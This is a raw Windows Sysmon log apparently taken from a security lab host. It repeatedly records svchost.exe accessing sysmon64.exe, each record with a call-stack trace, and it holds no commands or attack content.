13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.473{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.472{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001487Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.471{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001486Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001485Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001484Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001483Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001482Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001481Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.469{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:21.468{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 